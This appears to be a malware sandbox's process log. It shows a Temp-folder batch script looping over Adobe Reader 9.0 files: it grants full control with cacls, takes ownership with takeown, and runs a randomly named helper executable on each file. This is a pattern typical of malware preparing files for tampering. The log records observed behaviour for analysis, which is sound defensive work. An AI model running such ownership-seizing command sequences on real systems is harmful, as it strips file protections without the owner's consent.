C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵PID:1132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:1292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵
- Modifies file permissions
PID:1768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "CP1258.TXT" -nobanner3⤵PID:872
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "CP1258.TXT" -nobanner4⤵PID:1484
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵PID:1412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:1032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵PID:820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "icudt26l.dat" -nobanner3⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "icudt26l.dat" -nobanner4⤵PID:1248
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵PID:1444
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:1040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵PID:1816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "ICELAND.TXT" -nobanner3⤵PID:324
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "ICELAND.TXT" -nobanner4⤵PID:1464
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""2⤵PID:708
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C3⤵PID:1972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"3⤵PID:432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "CP1252.TXT" -nobanner3⤵PID:1164
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "CP1252.TXT" -nobanner4⤵PID:744
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵PID:1828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C3⤵PID:1672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"3⤵PID:1608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "add_reviewer.gif" -nobanner3⤵PID:912
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "add_reviewer.gif" -nobanner4⤵PID:1528
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""2⤵PID:1464
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C3⤵PID:1768
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"3⤵PID:1444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "end_review.gif" -nobanner3⤵PID:1428
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "end_review.gif" -nobanner4⤵PID:1132
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵PID:1032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:1728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵
- Modifies file permissions
PID:708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "pdf.gif" -nobanner3⤵PID:1460
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "pdf.gif" -nobanner4⤵PID:1412
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵PID:612
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:1120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵PID:1828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "review_shared.gif" -nobanner3⤵PID:324
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "review_shared.gif" -nobanner4⤵PID:1832
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1444
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵PID:1572
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵PID:432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵PID:1616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "tr.gif" -nobanner3⤵PID:996
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "tr.gif" -nobanner4⤵PID:1484
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""2⤵PID:1412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:1608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Identity-H" -nobanner3⤵PID:1816
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Identity-H" -nobanner4⤵PID:1196
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""2⤵PID:324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"3⤵PID:912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "MinionPro-BoldIt.otf" -nobanner3⤵PID:1628
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "MinionPro-BoldIt.otf" -nobanner4⤵PID:432
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵PID:1020
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:1132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵PID:1460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "zx______.pfm" -nobanner3⤵PID:744
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "zx______.pfm" -nobanner4⤵PID:1608
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵PID:932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:1768
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵PID:1664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵PID:1944
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵PID:1760
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵PID:432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C3⤵PID:1728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵
- Modifies file permissions
PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "can.fca" -nobanner3⤵PID:996
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "can.fca" -nobanner4⤵PID:1188
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""2⤵PID:1528
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C3⤵PID:1828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"3⤵
- Modifies file permissions
PID:936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "usa.fca" -nobanner3⤵PID:748
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "usa.fca" -nobanner4⤵PID:1548
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1040
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""2⤵PID:604
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C3⤵PID:1948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"3⤵PID:792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "CENTEURO.TXT" -nobanner3⤵PID:1832
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "CENTEURO.TXT" -nobanner4⤵PID:292
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵PID:1132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵PID:872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "SYMBOL.TXT" -nobanner3⤵PID:820
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "SYMBOL.TXT" -nobanner4⤵PID:1032
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵PID:1412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:1664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵PID:1164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "CP1257.TXT" -nobanner3⤵PID:1056
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "CP1257.TXT" -nobanner4⤵PID:2020
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1196
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵PID:1816
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵PID:604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "pmd.cer" -nobanner3⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "pmd.cer" -nobanner4⤵PID:1672
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵PID:944
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:1248
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵PID:1064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "distribute_form.gif" -nobanner3⤵PID:996
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "distribute_form.gif" -nobanner4⤵PID:708
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""2⤵PID:1948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C3⤵PID:1484
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"3⤵PID:612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "form_responses.gif" -nobanner3⤵PID:748
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "form_responses.gif" -nobanner4⤵PID:1444
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵PID:1460
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵PID:872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵
- Modifies file permissions
PID:1832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "reviews_super.gif" -nobanner3⤵PID:324
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "reviews_super.gif" -nobanner4⤵PID:1480
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""2⤵PID:1664
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C3⤵PID:744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"3⤵
- Modifies file permissions
PID:944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "server_ok.gif" -nobanner3⤵PID:652
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "server_ok.gif" -nobanner4⤵PID:792
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""2⤵PID:1728
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C3⤵PID:1464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"3⤵PID:932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "br.gif" -nobanner3⤵PID:2020
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "br.gif" -nobanner4⤵PID:1672
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵PID:1268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵
- Modifies file permissions
PID:1236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵PID:1032
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵PID:544
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""2⤵PID:996
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C3⤵PID:944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"3⤵PID:1196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "forms_received.gif" -nobanner3⤵PID:1824
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "forms_received.gif" -nobanner4⤵PID:912
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵PID:1488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:1760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵PID:932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵PID:432
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""2⤵PID:1288
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C3⤵PID:1132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"3⤵PID:1020
-
-
